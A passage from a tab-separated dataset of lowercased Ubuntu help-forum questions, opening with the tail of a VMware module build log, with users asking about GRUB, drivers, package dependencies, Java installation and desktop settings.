2014-02-03t16:32:00.950+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : reading in info for the vmmon module . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : reading in info for the vmnet module . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : reading in info for the vmblock module . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : reading in info for the vmci module . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : reading in info for the vsock module . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : setting vsock to depend on vmci . 2014-02-03t16:32:01.198+08:00| vthread-3| i120 : invoking modinfo on `` vmmon '' . 2014-02-03t16:32:01.203+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 0 . 2014-02-03t16:32:01.203+08:00| vthread-3| i120 : invoking modinfo on `` vmnet '' . 2014-02-03t16:32:01.210+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 256 . 2014-02-03t16:32:01.210+08:00| vthread-3| i120 : invoking modinfo on `` vmblock '' . 2014-02-03t16:32:01.214+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 256 . 2014-02-03t16:32:01.215+08:00| vthread-3| i120 : invoking modinfo on `` vmci '' . 2014-02-03t16:32:01.220+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 256 . 2014-02-03t16:32:01.220+08:00| vthread-3| i120 : invoking modinfo on `` vsock '' . 2014-02-03t16:32:01.225+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 0 . 2014-02-03t16:32:01.252+08:00| vthread-3| i120 : to be installed : vmnet status : 0 2014-02-03t16:32:01.273+08:00| vthread-3| i120 : obtaining info using the running kernel . 2014-02-03t16:32:01.273+08:00| vthread-3| i120 : setting header path for 3.13.0-031300-generic to `` /lib/modules/3.13.0-031300-generic/build/include '' . 2014-02-03t16:32:01.273+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.273+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:01.289+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.289+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:01.528+08:00| vthread-3| i120 : kernel header path retrieved from fileentry : /lib/modules/3.13.0-031300-generic/build/include 2014-02-03t16:32:01.528+08:00| vthread-3| i120 : update kernel header path to /lib/modules/3.13.0-031300-generic/build/include 2014-02-03t16:32:01.528+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.528+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:01.542+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.542+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:01.546+08:00| vthread-3| i120 : found compiler at `` /usr/bin/gcc '' 2014-02-03t16:32:01.553+08:00| vthread-3| i120 : got gcc version `` 4.8 '' . 2014-02-03t16:32:01.553+08:00| vthread-3| i120 : gcc minor version 4 does not match kernel gcc minor version 4 . but that is ok. 2014-02-03t16:32:01.553+08:00| vthread-3| i120 : using user supplied compiler `` /usr/bin/gcc '' . 2014-02-03t16:32:01.562+08:00| vthread-3| i120 : got gcc version `` 4.8 '' . 2014-02-03t16:32:01.563+08:00| vthread-3| i120 : gcc minor version 4 does not match kernel gcc minor version 4 . but that is ok. 2014-02-03t16:32:01.572+08:00| vthread-3| i120 : trying to find a suitable pbm set for kernel `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.572+08:00| vthread-3| i120 : no matching pbm set was found for kernel `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.573+08:00| vthread-3| i120 : gcc minor version 4 does not match kernel gcc minor version 4 . but that is ok. 2014-02-03t16:32:01.573+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.573+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:01.587+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 2014-02-03t16:32:01.588+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:02.909+08:00| vthread-3| i120 : gcc minor version 4 does not match kernel gcc minor version 4 . but that is ok. 2014-02-03t16:32:02.910+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:02.910+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:02.929+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 2014-02-03t16:32:02.929+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:02.929+08:00| vthread-3| i120 : using temp dir `` /tmp '' . 2014-02-03t16:32:02.974+08:00| vthread-3| i120 : obtaining info using the running kernel . 2014-02-03t16:32:02.974+08:00| vthread-3| i120 : setting header path for 3.13.0-031300-generic to `` /lib/modules/3.13.0-031300-generic/build/include '' . 2014-02-03t16:32:02.974+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:02.974+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:02.995+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 2014-02-03t16:32:02.995+08:00| vthread-3| i120 : the header path `` /lib/modules/3.13.0-031300-generic/build/include '' for the kernel `` 3.13.0-031300-generic '' is valid . whoohoo ! 2014-02-03t16:32:03.237+08:00| vthread-3| i120 : invoking modinfo on `` vmnet '' . 2014-02-03t16:32:03.245+08:00| vthread-3| i120 : `` /sbin/modinfo '' exited with status 256 . 2014-02-03t16:32:06.212+08:00| vthread-3| i120 : setting destination path for vmnet to `` /lib/modules/3.13.0-031300-generic/misc/vmnet.ko '' . 2014-02-03t16:32:06.241+08:00| vthread-3| i120 : extracting the vmnet source from `` /usr/lib/vmware/modules/source/vmnet.tar '' . 2014-02-03t16:32:06.370+08:00| vthread-3| i120 : successfully extracted the vmnet source . 2014-02-03t16:32:06.370+08:00| vthread-3| i120 : building module with command `` /usr/bin/make -j2 -c /tmp/modconfig-mjoi0c/vmnet-only auto-build header_dir=/lib/modules/3.13.0-031300-generic/build/include cc=/usr/bin/gcc is_gcc_3=no '' 2014-02-03t16:32:19.531+08:00| vthread-3| w110 : failed to build vmnet . failed to execute the build command .
414785	ca n't open gedit as root	when i run sudo gedit /path/to/some/random/file i get the following error ** ( gedit:6262 ) : warning ** : command line `dbus-launch -- autolaunch=7f8731869e1c690b8205727e0000000a -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed . can not open display : run 'gedit -- help ' to see a full list of available command line options . using gksudo does n't help either which returns can not open display : run 'gedit -- help ' to see a full list of available command line options . any help guys . i need to have this capability to open files in gedit as root . i found this question with the same error but no solution unable to launch gedit with sudo edit i found this post in ubuntu forums . these are the instructions : echo $ display # you 'll be needing this value 3 lines below sudo -i # or `` su - '' on older slackwares xauth merge ~alien/.xauthority # use your own username here instead of `` alien '' export display=:0.0 # use the value of display you 've seen 3 lines before on coming to command # 3 , i got this error xauth : file /root/.xauthority does not exist maybe this new info can shed more light .
414796	remove packages ubuntu 12.04	i 'm doing a bit of cleaning on my ubuntu 12.04 lts . i 've noted that when i install a package ( via apt-get install packagename ) , the depends and recommends packages linked at this package are also installed . i 'm wondering if it 's possible remove the recommends packages without any problem/ lose stability ? instead , as for the depends packages , i think that 's no possible . right ? thanks . stefano
414797	how can i install ubuntu to sd card ?	i 'm trying to install ubuntu 13.10 directly on my sd card to save energy and use hdd just for data , but i 've some problem . i 've created a startup disk in my sd with unebootin . i 've disabled efi , set sd as first choice in boot , but when i restart the pc , it automatically returns to the screen boot . how can i fix this ?
414799	is there any version of ubuntu not in simplified chinese , but in traditional chinese ?	i am from hong kong and we use only traditional chinese . in hong kong sar , people do not usually use simplified chinese . is there a version of ubuntu that provides traditional chinese ?
414802	jfs support missing on ec2 instance ?	i just launched new ec2 instances with the ubuntu precise and saucy amis . i installed jfsutils , but i am unable to mount a jfs volume : $ sudo mount -a mount : unknown filesystem type 'jfs' looking at /proc/filesystems it seems that neither jfs nor xfs are listed ( nor btrfs , for that matter ) . there does n't seem to be any module to load : $ sudo modprobe jfs fatal : module jfs not found . it looks like the standard 'generic ' kernel is installed : $ uname -a linux ip-10-0-0-209 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux what am i missing ? am i just stuck with ext3/4 on this machine ? jfs did work on the 10.04 ec2 amis .
414805	how do i make all links open in chromium or chrome 's incognito mode ?	how do i configure ubuntu or xubuntu such that when i click on a link , chromium/chrome opens in `` incognito mode '' ?
414807	unable to boot ubuntu after updating from windows 8 to 8.1	i was having windows 8 and ubuntu 12.10 ( dual-boot ) on my laptop . recently i updated windows 8 to 8.1 . from then on when starting the system i can not see the grub ( directly boots into windows ) . i should get into setup to boot into ubuntu which gives me this error error : unknown filesystem . grub rescue > after reading few forums i have found few solutions that let me do this set prefix= ( hd0 , gpt7 ) /boot/grub insmod normal normal this successfully lets me boot into ubuntu . but according to answer , later on typing these commands in terminal would let us get out of that problem from next time . sudo update-grub ( run this in terminal after getting into ubuntu ) sudo grub-install /dev/sda ( run this in terminal after getting into ubuntu ) but its not in my case . i still face the same problem as previous . please someone help me solving this issue .
414811	how do i install ubuntu on a pre-installed windows 8 laptop ?	i spent this whole weekend trying to come up with a solution on my msi gt70 . right now , i can boot using a live usb under legacy mode with nomodeset . however , i have trouble with booting it under uefi . i tried following steps ; i disabled fastboot disabled quick boot in win8.1 ( i upgraded the pre-install system ) , ininstalled intel rst my sata is under achi , so i disabled secure boot ( though i 'm sure that 's not the case ) enabled csm , i tried acip=off none of these worked for me under uefi . i even tried to install 12.04 lts and 13.10 by changing the usb several times . i 'm frustrated and have no idea what to do now . there must be something that i 'm missing . because , when i used nomodeset , it runs into bunch of lines , and after that is a black screen . i never get to see the x desktop , it 's always a black screen . can someone advise me what to do ? i tried everything on that post , nothing works , i ca n't boot my live usb , please do not just mark it as duplicate
414814	files in downloads folder deleted automatically	as mentioned in the title , this has been happening for some days . and now that ; whatever i download from linux dc++ , it goes to /home/user/downloads folder ( set as default in dc++ settings ) but after some time it disapears on its own . i had around 40gb worth of data in my downloads folder which got lost automatically . the problem is that in properties it is showing 2gb of space remaining where it should have shown 42gb remaining . this means that the 40 gb space has become irrecoverable . any help would be appreciated . p.s . - this has happened with me before . that time i found all my files in the /home/.dc++ folder . but this time i ca n't find them anywhere . i am using ubuntu 12.04 singhaal @ singhaal-pc : ~ $ uname -a linux singhaal-pc 3.2.0-58-generic-pae # 88-ubuntu smp tue dec 3 18:00:02 utc 2013 i686 i686 i386 gnu/linux
414817	make nautilus as default file browser	i had set nemo as default file manager on my unity desktop . i want return to old configurations and nautilus be my default file manager . how can i do that ?
414818	stuck on login screen !	i have only one user account on lubuntu 13.10 and the automatic access was enabled . i decided to change this option , i wanted to see the login screen on startup where i can choose the user and run the session only typing my password . i went to menu > preferences > default applications for lxsession > settings and ticked the upstart session option . after reboot i can see the login screen , i can choose between my account and the guest one , i select my account , i type the password , it takes it , it seems for one second to load the session , the panel ... but it takes me immediately back to the login screen ! i ca n't get in my account anymore ! i guess i have to modify ( with a live session ) some files in /usr/share/upstart/session folder , but i do n't know how . or maybe i can login my account in another way , then change the upstart session option ! i wish someone could help , thanks in advance .
414826	how to flush dns in ubuntu 12.04 ?	how to flush dns of ubuntu 12.04 lts ( gnu/linux 3.2.0-23-generic x86_64 ) have tried many things form here and here also but nothing is working
414830	hack battery preference for gnome 2 mate on ubuntu 13.10	i am using ubuntu 13.10 on my 32-bit computer . however , i missed the gnome desktop environment so i installed mate 2 . i have encountered a problem with the battery preferences . i do n't want to put the pc to a sleep mode when i close the lid . i also do n't want to lock my pc or dim the screen when i 'm idle . please tell me how to hack the battery preference for the gnome 2 . thanks .
414831	how to repair broken gcc compilers	i want to install g++ . but i got error sanket @ sanket-inspiron-n5110 : /opt/objdir $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : g++ : depends : g++-4.8 ( > = 4.8.1-4~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . please help me
414835	ubuntu for old amilo pro	i recently installed ubuntu on my pc and i was amazed how fast it is . my parents got old laptop which they use only for surfing the web and watching movies sometimes ( they just plug tv into it and watch from hdd ) . it 's fujitsu-siemens amilo pro v2055 . i wanted to install ubuntu on this `` rig '' , i have a feeling it will perform much better than winxp . it 's technical parameters are : 1.6 ghz intel celeron m420 , 1 gb ram , via/s3g unichrome 64 mb gpu , 80 gb hdd . so , my question is : which version would run well on this machine ? and are the drivers available ? shando
414837	can i manage ubuntu users or multiple pcs by using windows xp.. ?	actually i have 10 ubuntu pcs and i want to centralize management all of them via windows xp . all pcs are connected using wi-fi . i have problem with command line interface so i want to manage all of them by windows xp . please give me a permanent solution .
414838	delete several files but leave the selected one	i have a folder contenting several folders and i hope to delete all of them but leave one selected , how could i do this with the command `` rm `` under ubuntu12.04 ? ?
414841	which applications to start at login	i am running ubuntu 12.04 lts . my desktop manager is gnome3 . when i open `startup applications ' [ i can view all hidden applications ] i see many programs which have no description . how can i know what they do ? i want to disable those startup applications which are no use to me . i have already disabled backup monitor , bluetooth manager , gwibber and such applications . so in order to disable other not needed apps i want to know what they do .
414845	ubuntu sdk - custom executable	i have a problem with ubuntu sdk . i try to run project ( qml and c++ ) but i get pop up window with message `` could not find the executable '' and some settings ( command , arguments , working directory ) how should i run it ?
414846	network performance degradation in 12.04 lts	upgrading the kernel from 3.8.0-34 to -35 reduced my performance in local network roughly by a factor of 10 ( both smb and nfs ) . rebooting into 3.8.0-34 fixed the problem for the moment . output of 'ip link show ' 'ethtool ' are identical , independent booted kernel . how can i fix this or at least further analyze th issue ?
414847	how do i give myself fast access to pasting some common strings ?	i often find myself pasting the same strings into the browser ( i have a youtube channel , and at the end of the videos i constantly post the same links : channel url , website , email , introductory video , etc ) . i thought about creating a text file and then adding it to the unity panel , but unfortunately while i see the way to add the text editor to it , i ca n't add the text file to be opened with the text editor . i could probably put a script together and add that to the panel , but then it struck me that other people probably had the same time wasting experience , and probably have already found the solution . in the perfect world i need an application that stores commonly needed strings , when loaded it would right away start on top of other windows and stay as such , it would have buttons for different strings , and they would be placed into the buffer as soon as pressed . this way i would just assign that which i need to those buttons and be very very happy . if no good solution exists , i will just have to create it myself , i guess . after all my channel is about programming , and i can probably make a wonderful lesson just out of creating such a tool .
414854	wifi and network menu problems in 13.10	i have wireless usb adapter works on windows 7 now network menu not responding and i 'm not sure how to install drivers how can i recover the network menu to working condition in ubuntu 13.10 the usb device came with numerous files one of wich is zipped folder rtc8192_8188cu_linux_v3.0.21 size 899.7kb type tar archive . before i busted the network menu it would show wireless device and say connecting then say disconnected . my landline internet is still functioning but i will discontinue it if i can link to my mobile wifi in ubuntu . does the driver enable the lb link usb adapter to connect the pc with the service providers wifi pocket gateway ? ( if the tar archive is still in a folder should it be changed and where should it be placed )
414859	moving from elementary os to xubuntu	one of my pcs is dualbooted between elementary os luna running on kernel 3.11 and xubuntu 3.10 . elementary os is no longer booting correctly , it 's booting into tty . i am unable to connect to the internet from there . what i want to do is to , somehow , go to my xubuntu partition , backup everything that i have on elementary os , remove elementary os , install ( or reinstall ) xubuntu on the whole hard disk , and reinstall the backup . i can reinstall xubuntu without worrying about it , i have nothing there . but on elementary os , i have many apps installed from software center , and spotify and ruby and nodejs and django and my virtualenvs . is it possible to move all these to xubuntu ?
414862	pcie usb 3.0 controller not working	i am running ubuntu 13.10 and just got a sharkoon usb 3.0 pci-e x1 controller but ca n't get it to work . i tried lspci -v and can see the controller . what now ? $ lspci -v 02:00.0 usb controller : renesas technology corp. upd720202 usb 3.0 host controller ( rev 02 ) ( prog-if 30 [ xhci ] ) flags : fast devsel , irq 16 memory at fe9fe000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > edit : lsusb with a usb stick connected . the western digital technologies passport is connected to my onboard usb 2.0 and the mlk trust deskset is wireless my mouse and keyboard . $ lsusb bus 002 device 002 : id 1058:0704 western digital technologies , inc. passport external hdd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device mlk trust deskset001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 017c:145f mlk trust deskset bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub edit : i checked dmesg . $ dmesg | grep xhci [ 0.586087 ] xhci_hcd 0000:02:00.0 : xhci host controller [ 0.586093 ] xhci_hcd 0000:02:00.0 : new usb bus registered , assigned bus number 9 [ 24.714828 ] xhci_hcd 0000:02:00.0 : ca n't setup [ 24.714832 ] xhci_hcd 0000:02:00.0 : usb bus 9 deregistered [ 24.714879 ] xhci_hcd 0000:02:00.0 : init 0000:02:00.0 fail , -110 [ 24.714883 ] xhci_hcd : probe of 0000:02:00.0 failed with error -110
414863	topicons gnome extension gets disabled after lock screen in 13.10	just upgraded to gnome ubuntu 13.10 along with gnome shell 3.10 . as with others , immediately had issues with extensions becoming disabled at boot . the workaround to set session to `` system default '' via gdm works ; however , the topicons extension continues to be disabled at lockscreen . manually re enabling this works . this is related to this bug : https : //bugs.launchpad.net/ubuntu/+source/gnome-shell/+bug/1236749 topicons is a must have extension with gnome shell . how can i make sure this extension is enabled when coming out of the lock screen ?
414867	dependency broken	can any one please help me how resolve this problem the following packages have unmet dependencies : libav-tools : depends : libavdevice-extra-53 ( > = 4:0.8.9 ) but it is not installed depends : libavfilter-extra-2 ( > = 4:0.8.9 ) but it is not installed depends : libavformat-extra-53 ( > = 4:0.8.9 ) but it is not installed depends : libpostproc-extra-52 ( > = 4:0.8.9 ) but it is not installed depends : libswscale-extra-2 ( > = 4:0.8.9 ) but it is not installed libavdevice53 : depends : libavformat-extra-53 ( > = 4:0.8.9 ) but it is not installed libavfilter2 : depends : libavformat-extra-53 ( > = 4:0.8.9 ) but it is not installed depends : libswscale-extra-2 ( > = 4:0.8.9 ) but it is not installed libavformat-dev : depends : libavcodec-dev ( = 4:0.8.9-0ubuntu0.12.04.1 ) but 4:0.8.9-0ubuntu0.12.04.1 is installed depends : libavformat-extra-53 ( > = 4:0.8.9 ) but it is not installed depends : libavutil-dev ( = 4:0.8.9-0ubuntu0.12.04.1 ) but 4:0.8.9-0ubuntu0.12.04.1 is installed libavformat53 : libpostproc52 : libswscale2 :
414871	play video files problem , graphics card issue ?	recently installed ubuntu 12.04.3 lts ; problem : when i play video files , i only get sound , no video whatsoever , youtube video work though . how do i fix this ? there 's not video card installed , just using the internal graphics from mobo . motherboard : asus p5vd2-mx
414872	kde display manager	i have install kde plasma desktop then the kde display manager ( kdm ) appeared ? i want to restore lightdm i have tried sudo dpkg-reconfigure kdm but without any benefit . thanks
414873	error during intstallation of ubuntu with wubi	during installation the download and extraction part went fine but at the end of the expantion part it gives the following error :
414883	cairo dock , white border lines on all icons	i have ubuntu 13.10 ( i think , the latest one ) and even thou i love unity i kind of did not like the left bar so i installed cairo dock which is great , but at random times the whole dock gets white border lines around every icon . quitting cairo and restarting it , does not help , the only thing that helps is computer reboot . any ideas what the problem might be ? i would post an image but i do not have enough reputation to do this ( a bit odd imo , since a lot of newbies that have problems will not have reputation on this site ... )
414885	`` oracle jdk 7 is not installed '' error ?	i 'm trying to install jdk7 on ubuntu 12.4 . in the first try , the power has gone and the laptop shutdown in the middle of downloading jdk7 using terminal as i was using the next terminal commands sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer when the power returned and i tried to install jdk7 again there was a problem with the lock but i fixed it using the following commands after restarting the machine sudo apt-get install whatever after that i tried installing again using the three commands above , the first was done with no errors and the second too , but the third command downloaded the package successfully but an error appeared download done . removing outdated cached downloads ... sha256sum mismatch jdk-7u51-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i searched for solutions for this error and found some , tried the following instructions sudo rm /var/lib/dpkg/info/oracle-java7-installer* sudo apt-get purge oracle-java7-installer* sudo rm /etc/apt/sources.list.d/*java* sudo apt-get update sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer tried again but the same `` oracle jdk7 is not installed '' error appeared . tried sudo apt-get -f install salahuddin @ salahuddin : ~ $ sudo apt-get -f install [ sudo ] password for salahuddin : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 259 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up oracle-java7-installer ( 7u51-0~webupd8~1 ) ... downloading oracle java 7 ... -- 2014-02-03 16:28:51 -- http : //download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 41.128.128.35 , 41.128.128.40 connecting to download.oracle.com ( download.oracle.com ) |41.128.128.35|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-i586.tar.gz [ following ] -- 2014-02-03 16:28:51 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.48.230.140 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.48.230.140|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-i586.tar.gz ? authparam=1391437853_a122991b0aaf032ed8c2812472d1c92c [ following ] -- 2014-02-03 16:28:53 -- http : //download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-i586.tar.gz ? authparam=1391437853_a122991b0aaf032ed8c2812472d1c92c connecting to download.oracle.com ( download.oracle.com ) |41.128.128.35|:80 ... connected . http request sent , awaiting response ... 416 requested range not satisfiable the file is already fully retrieved ; nothing to do . download done . removing outdated cached downloads ... sha256sum mismatch jdk-7u51-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) do n't know how to fix it please help thanks in advance
414888	could not open stream ( livestreamer )	i use ubuntu 12.04 32-bit.i recently installed livestramer to see youtube video via command line.now while playing i am giving the following and getting an error -- $ livestreamer http : //www.youtube.com/watch ? v=kxhy7zsir50 best [ cli ] [ info ] found matching plugin youtube for url http : //www.youtube.com/watch ? v=kxhy7zsir50 [ cli ] [ info ] opening stream : 360p [ cli ] [ error ] could not open stream : unable to open url : ht tp : //r8 -- -sn-i3b7snek.googlevideo.com/videoplayback ? ipbits=0 & itag=18 & upn=w6px2buq2im & key=yt5 & ip=117.194.212.35 & sver=3 & expire=1391460443 & fexp=900225 % 2c945001 % 2c916807 % 2c929428 % 2c916611 % 2c936910 % 2c936913 & gcr=in & sparams=gcr % 2cid % 2cip % 2cipbits % 2citag % 2cratebypass % 2csource % 2cupn % 2cexpire & source=youtube & ms=au & ratebypass=yes & id=917872ed9b22479d & mv=m & mt=1391437099 & signature=05133fa0209d3b6531710a0cca78866e31187071.039fd919b9ca39f498c1454a8402649107fa5638 ( 403 client error : forbidden ) and for this i ca n't play this video in vlc . what should i do ?
414892	switching workspaces in gnome-shell 3.10 de-focus all windows	i am using ubuntu 13.10 with gnome-shell 3.10 installed from ubuntu gnome `` next '' repo . the problem i am facing is that when i switch workspaces ( ie . using ctrl-alt-arrow combination ) , all windows being currently open on given workspace simply loose focus , actually nothing is focused at the time . i then need to either click on a window or flick with alt-tab to get desired window to gain focus again . example : google chrome window on workspace 1 has focus switch to workspace 2 ( ctrl+alt+down ) switch back to workspace 1 ( ctrl+alt+up ) no window has focus on workspace 1 , need to click it or press alt-tab to focus the window expected behaviour : the last focused window on given workspace should re-gain focus as soon as i switch back to that workspace . the `` focus mode '' setting in tweak tool is set to `` click '' , however i do n't recall having such problem before , ie . with earlier versions of gnome-shell . changing mode to `` sloppy '' or `` mouse '' is not an option , as i do n't like the idea of mouse cursor driving focus . also tried to disable all extensions i currently have enabled -- no luck either . anyone experiencing similar issue and managed to solve it ? update just ~hour after posting this question i 've managed to nail the issue . turned out to be really really trivial : google hangouts extension in google chrome has had `` keep hangouts on top of other windows '' option switched on . how lame of me . well , it 's been cool to have hangouts chats pinned to the notification panel but i finally can have focus working properly again .
414893	problem with openstack instances	hello all i have the following problem : the instance is running but ca n't reach it ? any ideas ?
414898	epson xp 205 stopped working	i have had this printer for about a year now and both printer and scanner have been working find . today for no apparent reason it will not print . the wifi connection is showing on ( green light ) its printing wirelessly from windows ok so i dont think its the printer . when opening printer in settings it shows `` connected to local host '' but there is an ! mark on the printer icon . clicking on status shows `` may not be connected '' and state shows `` the printer is unreachable at this time . '' looks like a blip in the wifi connection . please can anyone help . thanks
414902	opengl direct rendering not working , messed shared library - 13.10/64bit nvidia	i was trying already different tips here on forums but i ca n't fix it . i have newest nvidia on 13.10 64bit . so i give you just output of some few commands : outputs here could anybody help me to cleanup that stuff
414905	how can i combine find command with gzip	i am trying to compress a specific files : find /media/mount/storage -newermt `` 2013-08-01 00:00:00 '' -path '*/*wind.txt ' -print0 | xargs -0 gzip -l > > file_system.tar.gz but i am getting the following error : gzip : /media/mount/storage/20130811120802_rhi1/20130811121000_wind.txt : not in gzip format where do i make the mistake ? edited : with the answer written by chronitis sometimes the tar is recreated , this is the output : /media/mount/storage/file system/20130505082135_ct1/20130505090000_wind.txt /media/mount/storage/file system/20130505085301_ct1/20130505090000_wind.txt tar : removing leading `/ ' from member names < - the size of the tar became zero /media/mount/storagefile system/20130505085301_ct1/20130505091000_wind.txt /media/mount/storagefile system/20130505085301_ct1/20130505092000_wind.txt
414906	ubuntu 13.10 - sound stopped working	i 've been running ubuntu 13.10 since it 's release and have n't had any issues with the sound up until this morning . when i logged in i found that it was no longer working . below is a screen shot of my sound settings as well as the properties of the card i had been using . as you can see , my devices are being detected and set to play . when i run alsamixer everything appears normal but the auto-mute feature is missing . i 've tried alsa force-reload as well as uninstalling and re-installing alsa . i 've also tried the suggestions listed in the comments section here : http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ i 'm not sure what the problem is or what else to try . could it be an obscure configuration issue ? any help would be greatly appreciated . properties : alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xd2710000 irq 46 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1e20 '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' device.description = `` built-in audio '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci ''
414908	how do i reinstall windows 7 ( from dell recovery partition ) while keeping my dual boot configuration ?	this old question says how to reinstall windows 7 from dvd without messing up the ubuntu partition : how do i reinstall windows 7 while keeping my dual boot configuration ? however , i have a dell laptop -- which means that i do not have media ( dvds or usbs ) for installing windows and drivers ; instead , the installation files are on my `` recovery partition '' . ( my recovery partition is still there -- i did n't touch it when i installed ubuntu . ) is it still possible to reinstall windows without messing up ubuntu ? if so , how do i start ?
